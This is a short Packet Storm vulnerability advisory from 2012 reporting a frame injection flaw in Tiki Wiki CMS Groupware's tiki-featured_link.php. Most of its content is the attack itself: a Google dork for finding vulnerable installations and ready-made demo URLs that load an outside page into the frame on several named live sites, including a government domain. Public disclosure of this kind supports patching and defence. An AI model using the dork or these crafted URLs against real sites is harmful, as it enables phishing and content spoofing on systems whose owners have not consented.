Tiki Wiki CMS Groupware Frame Injection

2012-02-18T00:00:00
ID PACKETSTORM:109912
Type packetstorm
Reporter Sony
Modified 2012-02-18T00:00:00

Description

                                        
                                            `# Exploit Title: Tiki Wiki CMS Groupware Frame Injection  
# Date: 17.02.2012  
# Author: Sony  
# Software Link: http://info.tiki.org/tiki-index.php  
# Google Dorks: inurl:tiki-featured_link.php?type=  
# Web Browser : Mozilla Firefox  
# Blog : http://st2tea.blogspot.com  
# PoC:  
http://st2tea.blogspot.com/2012/02/tiki-wiki-cms-groupware-frame-injection.html  
..................................................................  
  
We have Frame Injection in the Tiki Wiki CMS Groupware.  
  
Demo:  
  
http://stats.tiki.org/tiki-featured_link.php?type=f&url=http://st2tea.blogspot.com  
  
http://2.bp.blogspot.com/-em2guD5zVl4/Tz6R6Rp4eGI/AAAAAAAAAg4/PjyEb1BAEyY/s1600/tiki.JPG  
  
http://wiki.lxcenter.org/tiki-featured_link.php?type=f&url=http://st2tea.blogspot.com  
  
http://www.maps.gov.ck/tiki-featured_link.php?type=f&url=http://st2tea.blogspot.com  
  
etc..  
`